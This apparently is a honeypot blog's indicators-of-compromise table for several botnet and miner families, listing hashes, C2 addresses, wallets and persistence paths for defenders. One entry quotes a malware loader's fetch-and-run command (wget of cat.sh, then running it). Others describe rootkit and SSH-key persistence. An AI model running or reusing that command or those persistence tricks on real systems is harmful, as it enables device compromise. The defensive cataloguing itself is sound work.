ES EN
Home

Diary of a Lost Honeypot

Indicators

Everything worth searching for: hashes, addresses, domains, keys and strings from every specimen that has landed in the honeypot, with the chapter that explains where each one comes from.

If you got here searching for a hash or an address, this is what there is. Every indicator comes from a published analysis, and the link on the right leads to the chapter that explains where it comes from and what it means — which is what a list, on its own, never tells you.

The URLs are defanged on purpose (hxxp://, [.]): they identify just the same and can’t be clicked by accident. IPs and domains are given as they are — that is what makes them indicators.

KHserver ch. 11 · ch. 12

TypeIndicatorContext
sha256f7134ec664ca003c740337cf7b2fbba1162430d86ca1d7a2b5c14fe0463d261bhandshakebins.sh loader source →
sha256b297dc8f54f612f92c26735ab50e1360057df3909556d85e6439e695aa646148bot · Renesas SH (served as ARMV4L) source →
sha2560658e79b91e732723b540ee7040eb0289c497f781d750e42b25dfcf10d233f50bot · ARM (served as MIPS) source →
sha2565a21c34ff54ab1a92246b9cfba815ed187fe636b9350d41e26c5e4aa8f4bf891bot · ARM EABI4 (served as X86_64) source →
ip45.95.168.149:888command server · MAXKO d.o.o., AS211619 source → · my report ↗
ip213.232.114.14payload server · VirMach/xTom, AS3214 source →
ip45.135.194.26attacking IP · Pfcloud UG, AS51396 source →
urlhxxp://213.232.114[.]14/handshakebins.shloader download source →
cadenaKHserverHACKER · KHcommSOCKinternal marks in the binary source →
cadenaecho PAYLOAD_EXECUTEDpost-infection beacon source →
cadenaREPORT EXPLOIT %s %s:%dC2 protocol source →
cadena4E/x31/x6B/x4B/x31/x20…UDPBYPASS payload, inherited from SBIDIOT (2021) source →
cadenakhugepaged · kthreadd · kworker · systemd · dbus-daemonprocess names it masquerades as source →
cadenaAboriginal Linuxcross-toolchain it was built with source →

Sysorbit ch. 7 · ch. 8

TypeIndicatorContext
sha25631de5c5d0a3483e831e4f9348d46b3c5309177a7f9d6da537fc970f57f103901sysorbit.apk source →
dominioorbitcnc.twilightparadox.comlive C2 → 176.65.139.248:10293 source → · my report ↗
dominioupdatemc.twilightparadox.comlive C2 → 176.65.139.248:10293 source → · my report ↗
dominioudpatetbl.duckdns.org · coxm.duckdns.orgfallback C2 (dormant) source →
ip176.65.139.248distribution and C2 · port 10293 source → · my report ↗
tokenORBIT_BOT_AUTHVXJUACFHAVBAC2 authentication token source →
cert01:B9:F7:13:02:D0:B1:39:3B:B3:EC:FA:B8:1E:9B:B9:6F:C6:58:33:0A:18:15:EE:C9:32:C0:D9:F2:E8:5C:E9certificate impersonating a Spanish company source →
cadenacom.sysorbit.service.securityAndroid package source →
cadenasysorbit_watchdog · sysorbit_native_lockabstract sockets source →

RedTail ch. 5 · ch. 6

TypeIndicatorContext
sha256f0aa83bbbd2c75e2f71ec16029ee5fcfad59f3a8efa30a500b815f0f6c18d987miner x86_64 source →
sha256d1cac82f44b54b0fd244a9e4122811e9ae108a197c7a65a20fd2e7552683e68eminer aarch64 source →
sha2563f3bf218089d1488617d37f8a5116bb2791eb39ce06a1b5bc9a4cdfe5e94dd39miner riscv source →
sha2563f3a11bafabb1a35db913cfe51995f2e357d049e268860175876ae5a93d23892cleanup script source →
ip217.60.195.113delivery server · SFTP user dlr source →
ip103.46.186.105attacking IP source →
claveed25519 · comentario dlr@sftpprivate key planted to fetch the payload source →
sha2560db4656687a425c47d19000db866db52c7e415dbfaf6b5c651adcb9275ab23cathe private key, exactly as written to disk source →
sha256ae8d459595257f2f22c9d1ff74c4fb8a91643fad7899b57556496716692b904ethe sshcfg shipped with it · StrictHostKeyChecking no source →
cadenaauth_ok · redtail_bot_telnet_okbeacons source →
puerto2137/TCPits mining pools' port source →
ruta/var/build/redtail/scripts/x86_64-build/build path left inside the binary source →

Mirai ch. 3 · ch. 4 · ch. 17

TypeIndicatorContext
sha256bf0aabf517685756f16b22f4b1907113a1cd160fa7b5ee384cb554b42b311841bot x86-64 source →
sha2568bdbe21eafc7223a75ea9d075237d389e0c39f6370721f1ea36214989e5bab63bot ARM source →
sha2565c502903694591a219ca263247c4c159967c5838c9a85641f3fb908b983d1e32bot MIPS (BE) source →
sha256a75a98641037e42abb4c543d90e81dafdae3b27e90972b705a2e9242a5bee123bot MIPS (LE) source →
sha2569d44d4d051f6aa3fbc95fab0aae818347a602d655fa7f1fba6267e728d7ff2d3bot PowerPC source →
sha256abda6887930f4e2e1047b39adf23bbf8bdee9e15c7e2101245bb690be7d80488bot SPARC source →
sha2563366350561c41f5d15994244bfd7358ca256d16a1e954d7a986bd4d2d50c895ebot Motorola m68k source →
sha25641ac975aa0638b879bade9f672fbcdacb303bc6ceb5e92083b85af9cd440cd04bot Renesas SH source →
dominiokappadocia.netC2 → 141.98.10.50 source →
ip5.182.210.174delivery server (Go FileServer) source →
dominiocc.nhancute.siteC2 · port 47925 → 160.250.181.124 (the same box that delivers) source →
ip160.250.181.124delivery and C2 · VPSRE, Vietnam, AS150895 source →
ip160.250.181.123attacking IP over ADB · sweeps, then loads source →
urlhxxp://160.250.181[.]124/k7m2q9xa/delivery directory (12 architectures) source →
urlhxxp://160.250.181[.]124/b4k9zp[.]shdropper (the other two: a7m2qx.sh, c8r3nv.sh) source →
sha256e60423da9b1484739cf0b7b883f2b74c9b9acab07e9db90c468960a691650fb1bot ARM · served as «arm» source → · my sample ↗
sha256873072018241d6efac32e47b8061d76f4b124ba6e6ab69609714f814b2a97f46bot ARM · served as «arm5» source → · my sample ↗
sha256ee7c389272eed8a12562f29c985b93d2273ffff0cced791bd51e7ebe3ffe7ab0bot ARM EABI4 · served as «arm6» source → · my sample ↗
sha256239751754b0a33534fb3370d70a85cf409d346fb50fb96819756313958f7e4f2bot ARM EABI4 · served as «arm7» source → · my sample ↗
sha256b08b41923efe6973da9c9782fd32df33bdd2b6f61ca421918b111bf9fc839098bot Motorola 68020 · served as «m68k» source → · my sample ↗
sha256904d5309b45a0691ec526de4daac7a039c717e933e0f4410e1eb6a9e82275764bot MIPS (BE) · served as «mips» source → · my sample ↗
sha25635574f2eb27f869415538a0e85531fa225416fc4e2b9e323d37bbcd519088b25bot MIPS (LE) · served as «mpsl» source → · my sample ↗
sha2560a8f44e98e4a87e20cf492dfab870d8067d31e4650a9200d55545eb13cfc48b5bot PowerPC · served as «ppc» source → · my sample ↗
sha2562f468807a88b41d0386960ed7cf48ea6a3bc1222ff1139cf8ca6194cec62737dbot SPARC · served as «sh4» source → · my sample ↗
sha25607fe68558b309c5537d7f751a879cb64baa0960f28eb2e86c27076d7e219be4cbot Renesas SH · served as «spc» source → · my sample ↗
sha2566502ee33f11f99c9e52e10d301275e61e85065643c3628387e7436ca9b0fc9e5bot Intel i386 · served as «x86» source → · my sample ↗
sha2561bf4366ad6b382991c6b8c68b4863e9bafcc8e9533867b0e17b1d5825689c143bot x86-64 · served as «x8664» source → · my sample ↗
cadenatop1hbtcampaign marker (top1hbt.<arch>, what each bot re-serves) source →
cadena/var/Condi · condi2 %s:%d · webservthe family identifying itself source →
clavetable_key = 0x6d53d2c2XOR config · effective 1-byte key 0x2e (erases the domain dots) source →
cadena66 99 66bot↔C2 frame header + length (2 B) + payload (ping, condi2 webserv:<port>) source →
cadenaServer: Apache · User-Agent: Update v1.0each bot's fake httpd, on a random high port source →
ruta/sbin · /usr/sbin · /bin · /usr/bin × reboot, shutdown, poweroff, halt16 paths unlinked from main (the public Condi covers 8) source →
ip45.198.224.26attacking IP (loader) source →
cadenamilnetv4 · marcador .animevariant and family marker source →
claveXOR de 1 byte · 0x54config encryption source →
cadena/home/landley/aboriginal/…fingerprint of the Aboriginal Linux cross-toolchain, the one that shipped with the 2016 Mirai source leak · visible in the one binary of the batch left un-stripped source →

XorDDoS ch. 1 · ch. 2

TypeIndicatorContext
sha2566f45c6d9c70d97f695cb7bbef362812a17f8ed4d37dafc342c26c86ed9b43638bot source →
urlhxxp://169.239.130[.]20/new.phpdistribution server (loader) source →
dominiosys-kernel-update.tolive C2 → 141.98.11.51 · port 1529 source →
dominiotelemetry-pipe.sh · api-metadata-v6.isfallback C2 (dormant) source →
ip141.98.11.51live C2 · HostBaltic, AS209605 (LT) — the IP rotates within the ASN: in June it was 141.98.10.115. What endures is the domain + ASN pair source →
claveBB2FA36AAA9541F016-byte XOR key for the config source →
ruta/etc/cron.hourly/gcc.sh · /var/run/gcc.pidpersistence source →
cadenawget→good · curl→coolrenames the tools to blind rival botnets source →
ruta/usr/lib/libudev.socopies itself there on start-up · same SHA-256 as the sample source →
ruta/usr/bin/<diez letras al azar>copy under a random name · hash DIFFERENT from the sample (seen: nhwqrnmkhg, frxuyzisvv) source →
cadenacrond · /usr/sbin/gdm3 · rpc.statd · automount · rpc.idmapd · /sbin/audispddaemons it impersonates by faking argv[0] · the name the kernel sees is still the real one source →

Trinity ch. 13 · ch. 10

TypeIndicatorContext
sha25676ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64spreader (trinity) · OLLVM-obfuscated source →
sha256a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437endat · self-extracting container (APK + script + miner) source →
sha256d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0xig · launcher (153 KB) source →
clave44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAroperator's Monero wallet source →
ip139.99.9.133:5555active mining pool · OVH SAS, Singapore source → · my report ↗
ip78.46.89.102:7777fallback pool · Hetzner, Germany source → · my report ↗
ruta/system/bin/debuggerd (original → debuggerd64_real)persistence: hijacks Android's crash handler source →
cadenacom.google.time.timer · com.android.good.miner · com.google.test.testrival miners it uninstalls source →
sha2560d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257APK source →
md58844985fcd57b0311d1d4cb2ec13a1efAPK source →
cadenacom.ufo.miner · com.example.test.MainActivitypackage and activity source →
clavefwW95bBFO91OKUsz1VhlMEQwxmDBz7XECoinhive site key (the service shut down in 2019) source →
ruta/data/local/tmp/ufo.apkADB install path source →

VoIP ch. 9

TypeIndicatorContext
ip172.110.223.49INVITE flood · UA pplsip · AS23470 ReliableSite (US) source →
ip94.26.31.62INVITE flood · UA VOIP · AS29802 Hivelocity (US) source →
ip23.111.166.26INVITE flood · spoofed Cisco-SIPGateway UA source →
ip158.51.78.101REGISTER brute force · Turkey source →
ip185.114.48.195REGISTER brute force · AS199792 ClearStack (NL) source →
cadenapplsip · friendly-scanner · Cisco-SIPGateway (spoof)malicious SIP user agents source →

Cling ch. 18 · ch. 19 ⬇ YARA

TypeIndicatorContext
sha2561631e63ee373601c1f42f2674f996fc6c14dc6aebe45ca5d2395bf347a0e3661bot · aarch64 (hashes expire: the operator recompiles) source →
sha2561b831a9366cd53a4127f885dab247bc2f0b3f661a7d9d9510bbd0a9f150bfb27bot · i686 source →
sha25652bff4bf58eb6031c16763b12b696e849a38f36e69c55402a444819cb9c1bc0ebot · i586 source →
ip85.11.167.132infected node that hit the honeypot over Telnet source →
urlhxxp://118.145.196[.]225:800/delivery server (wget.sh + one binary per architecture) source →
cadenaclingwashereUser-Agent when spreading over port 7547 (TR-064) source →
ruta/root/.cling · /usr/local/bin/.cling · .cling en inittab/rcS/rc.booton-disk persistence source →
cadenafirma de red: STUN a 13 servidores casi a la vez · transaction ID a cero · baliza (etiqueta + 26 B) cada 5 swhat actually catches Cling: its behaviour, not the hash source →
cadenafirma del escáner: SYN salientes con puerto de origen fijo 9999a normal scan randomises the source port; this one pins it source →
cadena127.0.0.1:33957 en escuchalocal single-instance lock source →
cadenasuplantación de init: /proc/<pid> que es bind mount de /tmp, idéntico a /proc/1ask what it is and the kernel answers "init" source →
cadenaórdenes UDP disfrazadas de STUN, sin autenticación (deducido)the bot doesn't check who's commanding; not a reliable network signature source →
ip145.249.115.184the operator's mailbox (Aug-2026) · AS215540 · monoculture: 71/71 files talking to it are malware, 0 benign source →
ip94.154.43.158prior C2 (Jul-2026) · in a /24 that hops ASN; today AS219502 (Storm) source →
dominioboymoder.ddns.net2025 C2 · dynamic DNS source →

IranBot ch. 21 · ch. 22

TypeIndicatorContext
ip176.65.139.206a single machine does everything: attacks, delivers (:80) and is the C2 (:2000) · AS219502, Storm Industries source →
ip176.65.139.206:2000cleartext C2, unencrypted and domainless (revealed in ch. 22) source →
urlhxxp://176.65.139[.]206/cat.shdelivery server (cat.sh + iran.<arch> for 14 architectures) source →
credencialtelnet / telnetcredentials it logged into the honeypot with (root/icatch99 failed) source →
cadenacatloadercampaign tag in the loader's argv source →
cadenaNot a mirai at all · Death to israel · selfrep.realtekfamily markers in the binary's strings source →
cadenacd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://<ip>/cat.sh; chmod cat.sh; sh cat.shthe loader's infection chain (survives recompilations) source →
cadenaMozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/58.0.3029.110fixed User-Agent of its httpmode= method source →
cveCVE-2021-35394Realtek Jungle SDK (UDP 9034), one of its two propagation vectors source →
cadenapuertos fijos: 2000 (mando) · 9034/udp (Realtek) · 23 (escáner telnet)hardcoded in the binary source →
ruta/etc/init.d/xs.main · /etc/rc.localpersistence (documented by its VirusTotal record) source →
sha2566a4503094d0031ae36c8b27cc36696087831901dfa421675ccb7509c9d7e58dacat.sh loader (1,903 B) — hashes expire: it recompiles source →
sha256f35bf04216d14180f9d28f6770a5722557f4a979d746f4ef664419363d0b755bbot · x86-64 source →
sha2563f21d6f8621e38d2bc923dfaaf0861887c6ca0def522ae4dea0f9b840bf1d39abot · m68k source →
sha256064d93495573a536517fa7ddf9fb6d3c4cddd4c7fdc61d4f90d12629cad690e6bot · MIPS source →
sha256ce452891a6e017f2523f8c7005df1180003ab3e96916774efb432bcc2a8e657fbot · MIPSEL source →
sha256b1a6dba6636b519d76d7219f6264ac9f1456681c0855baef954fb435d3e25ce5x86-64 twin (164,272 B) used in the differential analysis · C2 103.83.87.122:8060 source →
dominiofemboys.chloebulldog.online:44510 · mythickass.onthewifi.com:313 · 103.83.87.122:8060the family's prior C2s (context) source →

DIICOT ch. 23 · ch. 24 · ch. 25 · ch. 26 · ch. 27 · ch. 28

TypeIndicatorContext
sha256a151d3f4f2422531f30a843ffb35479596c86722bb103bdf8591105687f9b125miner · the binary downloaded and run as .16 source →
ip92.118.39.77source IP · second visit source →
ip62.171.133.1source IP · third and fourth visit, the same repeat offender source →
urlhxxp://5.189.149[.]171/f/brute/m/.16_<arch>delivery server · structured path campaign/type/architecture source →
cadenafunction top() en ~/.bashrc que filtra la salida por sed borrando 16, libbase.sh y un número variableshell backdoor · the top command lies source →
ruta16 · /dev/shm/.16 · /root/.16miner process and file name source →
rutasystem-helper · /etc/cron.d/cron_d_<n> · /etc/ld.so.preload · /root/.profilepersistence · five routes at once source →
clave89PNDJssF3RbL6m7aSydYB4tLrvjZ28Cr8n4LucmFHat8botWkWr6oDPEaSHfeZn4wfA3dC5QsE7nZV1P6tE81sK2i9heamMonero wallet in use source →
ip169.58.248.162:443mining proxy · no TLS; extracted indicator, not an observed connection source →
ip5.189.149.171delivery server source →
dominioproject0.ccdelivery domain source →
dominiopool-{fr,phx,nyc,hk,sg,aus,ca}.supportxmr.com:5555backup pools · all seven, in the clear source →
claveXOR de un byte, clave 0x5Aconfig encryption · sweep all 256, it can differ between components source →
ruta/usr/local/lib/libcommon.sorootkit · hooks readdir source →
ruta/var/tmp/snap · .X0-lockpayloads on disk source →
cadena__TTY_GUARD_OK__self-check after writing the shell hook source →
clave87Fxj6UD…previous wallet · collecting since 2021-01-14, stopped 2026-08-03 source →
cadena16worker name at the pool · the same one it camouflages itself with on the machine source →
ip109.160.32.115source of the intrusion · ASN 197170 TechTies source →
sha25628e0c4d5bc6675537ba47c6529877a3194a29585fb86477f66bf13c79252d2f0dropper · Go + UPX, 16.6 MB, five modules inside source →
sha2567d55a90710b8e79283efd756e8d3423fc23e0dcf742d6027b1a2a1b9d02a9c16the bot · P2P mesh and Telegram command source →
sha25679a47c33335fe1ed871a23cf7972652ee08a3ec0afed1c2dc6b5a8df675e153dXMRig, unconfigured source →
sha256ffe04bc05a56f78b1273876cf17ded8df1aa3da5a15deb17dce99a3e206eb705the loader · persistence and download engine source →
sha256c1c122869f46aaf8c4e90f3132c93a801c853244c756966952d0bf19241cf084second miner source →
ruta/tmp/{cache,diicot,kuak} · /dev/shm/retea · /dev/shm/.x/{network,pass,bios.txt}the five modules and their dictionary, on disk source →
cadena/tmp/d.log con el contenido «admin»marker that the machine is already theirs source →
credencialroot:Huawei@123 en el diccionario del escánergives away what boxes it targets besides servers source →
puertoTCP 8081the mesh · listens and announces itself; target 2,000 connections source →
ip91.92.47.220:8081bootstrap neighbour hardcoded in the binary source →
ip31.57.105.94:42the attacker's own «what's my IP» service source →
token8778142498:AAE2YhxC6AB5PF8GOucHxCviYV4FA1JJnIETelegram bot identifier · already cancelled source →
cadenaUser-Agent: skemalooks like no browser at all · a good network signature source →
cadena6059167279the operator's number · the only one authorised to give orders source →
cadenaDIICOT-BOTNET · v2-update-1its own status panel gives its name and version source →
cadenapeers.dat · semilla p2p-peers-salt-v1the mesh's peer file source →
cadenamyservices.service → /bin/bash /usr/bin/ssshd · RestartSec=1800systemd service with a system-sounding name source →
ruta/usr/bin/ssshdwith three esses · it's the stager, not the SSH daemon source →
ruta/var/tmp/<8 hex>/8b8989e8root cron every minute · the directory changes with every infection source →
cadenaElPatrono1337comment on the SSH key it plants in /root/.ssh/authorized_keys source →
ruta/tmp/.fontconfig/.fc-cache · /var/tmp/.ladyg0g0/.pr1nc35 · /var/tmp/Documents/.diicoton-disk markers source →
sha2562bcc91fdedb8c583a9fe883be9ad453333a1bba0fdf655474982db3cbb8e7a74the stager that pulls down the mining config source →
urlhxxp://195.24.237.240/.x/black3second stage · down as of 19 Sep 2026 source →
dominiodigital.digitaldatainsights[.]orgsecond-stage backup · down source →
cadenaladyg0g0 · .pr1nc35other handles of the actor, in the paths it leaves source →